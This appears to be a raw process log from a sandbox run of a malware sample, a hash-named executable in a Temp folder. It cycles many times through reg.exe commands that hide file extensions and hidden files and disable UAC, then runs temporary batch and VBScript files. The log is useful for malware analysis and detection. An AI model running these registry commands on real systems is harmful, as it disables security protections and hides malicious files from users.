C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jUIkYkYw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4720925971578395492470191392-7757764191809803268-16247799811638154368-39982593"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1864478160120170354117585034081884450852-671791664-1594622474556628420628882677"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LKoUogQQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1692756134-1569057401-13706800298290406111475258981095352460-1117208403-1545004288"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\eKYooYIo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15609968034984541421543182891133663153495109285117104749679804323001630542026"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QckAIQUI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12509416026927318142096725294204804013-1360375399-92612759011404845761767225808"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qcMcQAoE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GwowsAgM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1816923942-128706800615600672884449482831390631741-1134942364943416911793927858"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2070730173310528321553305838507404257-2003348284-1626594177-9430019261716056602"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14590528821854449964-363393827-164189358120057033981828066381839783982-463241856"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HysMgAQs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17372263811328108428-130614108-1111064031104328384-2055641230-97107184-1684952622"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\NeYcosgc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\DWkgoEMY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15748874521036243652560757787-1589056108129304940571130264-2059309519668319462"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2194447402772254211918178904-13170180811362977618-1675358952-1263330036-292108776"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vcIUYsYc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-30153622693353212-720710848-1222392454-1213550944-1928254246-5203663601461788740"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-465119026767968202097392115190582870813532480121263696495731340134-523594851"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1290794424-126612602512458308421965331231-1343119009-18588610671788341577823543556"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QOwIYsEM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GSwwAEsA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "182106189514912862651685072499480323598-95354480-1769539453-13218315621794768537"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-8483015181278256805-205789315614359692602009921662-421554851813953957313155837"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13725605513093354671793382865-427877227-775351463-1974031941-888735851377599168"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SSQYkYgE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-737378151905298435534151276173806448117289973117389908-1173466684-1174291542"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "322053199904661953-524830710-2145414038948353816-1509821651-665611870-729876769"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15482366642042777786-971598928-18659104344422394971396546121518522463-1707775843"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\MeYUoQAg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-373605285-28266011325690016-435480548-789220797-1752765473-212586710-1583163133"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\agococIo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\NKQsEUok.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "411047244-453386863-16857293477292783896895225821024488203-1190776545657525577"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LIMsAQkw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10786200683393231321794657623-1084656173-913152617-1569955745-1037384453393264903"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "115186563-6023816462014974297-8040147041211001917-1864101914794121890-212354066"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\NWAYAwQE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2947360451164167800-842800822-629617017-371618529782446067-16909024061967545553"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2365097421232171291915037014-8283345063079574541136196981-50318680460426613"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16076476861813604907-658304186-3104018881357979989-1706914294-221171550988006625"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-595789200266104228-1498104282-2077640553-17138858047112850561534092483-1981441182"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VeEwQAEU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\goQoYIIk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1217558813-2042585799-1051105949-1487030866-554205188786813793-1999051991-2027004439"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
